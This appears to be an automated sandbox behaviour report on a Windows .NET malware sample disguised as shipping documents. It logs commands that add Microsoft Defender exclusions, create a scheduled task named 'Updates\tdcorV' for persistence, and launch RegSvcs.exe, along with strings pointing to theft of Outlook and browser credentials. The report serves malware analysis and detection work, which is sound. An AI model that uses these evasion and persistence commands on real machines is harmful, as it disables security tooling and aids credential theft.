Jump to behavior

Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000337A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rShippingDocuments240384.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

File read: C:\Users\user\Desktop\rShippingDocuments240384.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rShippingDocuments240384.exe "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tdcorV.exe C:\Users\user\AppData\Roaming\tdcorV.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: rShippingDocuments240384.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: rShippingDocuments240384.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: rShippingDocuments240384.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: dKuN.pdb source: rShippingDocuments240384.exe, tdcorV.exe.0.dr
Source:	Binary string: dKuN.pdbSHA256 source: rShippingDocuments240384.exe, tdcorV.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	.Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShippingDocuments240384.exe.7b70000.3.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	.Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	.Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	.Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	.Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])

Source: rShippingDocuments240384.exe

Static PE information: 0xC477B011 [Thu Jun 14 05:03:13 2074 UTC]

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C18FE1 push es; retn 0007h	0_2_07C18FE2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1AEA8 push ds; retn 0007h	0_2_07C1B092
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C19290 push es; retn 0007h	0_2_07C19292
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1A248 push cs; retn 0007h	0_2_07C1A24A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1AA2B push ss; retn 0007h	0_2_07C1AA42
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1A150 push cs; retn 0007h	0_2_07C1A152
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C19168 push es; retn 0007h	0_2_07C1916A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1A931 push ss; retn 0007h	0_2_07C1A932
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C190F9 push es; retn 0007h	0_2_07C190FA
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C1B097 push ds; retn 0007h	0_2_07C1B09A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31788 push ebx; retn 0007h	0_2_07C3178A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31717 push edx; retn 0007h	0_2_07C3171A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31671 push edx; retn 0007h	0_2_07C31672
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31561 push ecx; retn 0007h	0_2_07C31562
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31528 push ecx; retn 0007h	0_2_07C3152A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C314B8 push ecx; retn 0007h	0_2_07C314BA
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31431 push ecx; retn 0007h	0_2_07C31432
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31341 push eax; retn 0007h	0_2_07C31342
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C312C9 push eax; retn 0007h	0_2_07C312CA
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31D81 push edi; retn 0007h	0_2_07C31D82
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32D87 pushad ; retn 0007h	0_2_07C32D8A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32DBF pushad ; retn 0007h	0_2_07C32DC2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32D31 pushad ; retn 0007h	0_2_07C32D32
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31CD1 push esi; retn 0007h	0_2_07C31CD2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C32CF0 pushad ; retn 0007h	0_2_07C32CF2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31BE1 push esi; retn 0007h	0_2_07C31BE2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31B6F push ebp; retn 0007h	0_2_07C31B72
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31AC0 push ebp; retn 0007h	0_2_07C31AC2
